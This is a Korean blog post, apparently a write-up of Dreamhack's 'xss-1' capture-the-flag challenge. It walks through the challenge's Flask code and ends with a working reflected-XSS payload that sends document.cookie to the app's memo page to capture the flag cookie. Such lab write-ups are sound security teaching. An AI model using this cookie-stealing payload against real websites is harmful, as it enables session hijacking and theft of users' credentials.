rosieblue
Published 2023. 9. 22. 22:22
[드림핵(Dreamhack)] xss-1 🔐 Security/Web
728x90
@app.route("/flag", methods=["GET", "POST"])
def flag():
    if request.method == "GET":
        return render_template("flag.html")
    elif request.method == "POST":
        param = request.form.get("param") form에서 param을 param으로 저장
        if not check_xss(param, {"name": "flag", "value": FLAG.strip()}): 
            return '<script>alert("wrong??");history.go(-1);</script>'

        return '<script>alert("good");history.go(-1);</script>'

 

 

여기서 check_xss(param, {"name": "flag", "value": FLAG.strip()}) 호출

param은 우리가 flag에서 form으로 입력한 인자. 

 

@app.route("/memo")
def memo():
    global memo_text
    text = request.args.get("memo", "")
    memo_text += text + "\n"
    return render_template("memo.html", memo=memo_text)
    #memo인자를 화면에 출력

 

def check_xss(param, cookie={"name": "name", "value": "value"}):
# check_xss(param, {"name": "flag", "value": FLAG.strip()})
    url = f"http://127.0.0.1:8000/vuln?param={urllib.parse.quote(param)}"
    #flag의 param을 param=~~이런 식으로 get파라미터로 전달
    return read_url(url, cookie) 
    #read_url("http://127.0.0.1:8000/vuln?param=flag페이지param",플래그)

 

def read_url(url, cookie={"name": "name", "value": "value"}):
    #read_url("http://127.0.0.1:8000/vuln?param=flag페이지param",플래그)
    
    cookie.update({"domain": "127.0.0.1"})
    try:
        service = Service(executable_path="/chromedriver")
        options = webdriver.ChromeOptions()
        for _ in [
            "headless",
            "window-size=1920x1080",
            "disable-gpu",
            "no-sandbox",
            "disable-dev-shm-usage",
        ]:
            options.add_argument(_)
        driver = webdriver.Chrome(service=service, options=options)
        driver.implicitly_wait(3)
        driver.set_page_load_timeout(3)
        driver.get("http://127.0.0.1:8000/")
        driver.add_cookie(cookie) #쿠키에 cookie추가
        driver.get(url) #"http://127.0.0.1:8000/vuln?param=flag페이지param" 접속
    except Exception as e:
        driver.quit()
        # return str(e)
        return False
    driver.quit()
    return True

 

@app.route("/vuln")
def vuln():
# "http://127.0.0.1:8000/vuln?param=flag페이지param" 접속
# 쿠키는 {"name": "flag", "value": FLAG.strip(), "domain":127.0.0.1}
    param = request.args.get("param", "")
    return param #param을 화면에 출력

따라서 memo에 flag을 남기도록 하면됨

 

답:

<script>

location.href="http://127.0.0.1:8000/memo?memo="+document.cookie;

</script>

'🔐 Security > Web' 카테고리의 다른 글

[드림핵(Dreamhack)] file-download-1  (0) 2023.09.26
[Web] File Vulnerability 실습 (Dreamhack 'image-storage' 문제)  (0) 2023.09.26
[BurpSuite] Cluster Bomb Attack  (0) 2023.03.06
[BurpSuite] Intruder 기능 안의 공격들 정리  (0) 2023.03.03
[SQL Injection 팁] 내가 추측한 메타정보(테이블명/칼럼명 등)이 맞는지 확인하는 방법  (0) 2023.03.02
profile

rosieblue

@Rosieblue

포스팅이 좋았다면 "좋아요❤️" 또는 "구독👍🏻" 해주세요!

검색 태그

java
시스템해킹
C
스프링부트
폰노이만구조
blind injection
HouseofForce
포너블
모의해킹
버프스위트
컴퓨터구조
pwnable
SQL Injection
메모리 구조
SQL
링크
해킹
웹해킹
heap
스프링
Linux
차마포스팅이라고하기도민망한글
OS
spring
드림핵
오브젝트파일
어셈블리
리눅스
burpsuite
SpringBoot

티스토리툴바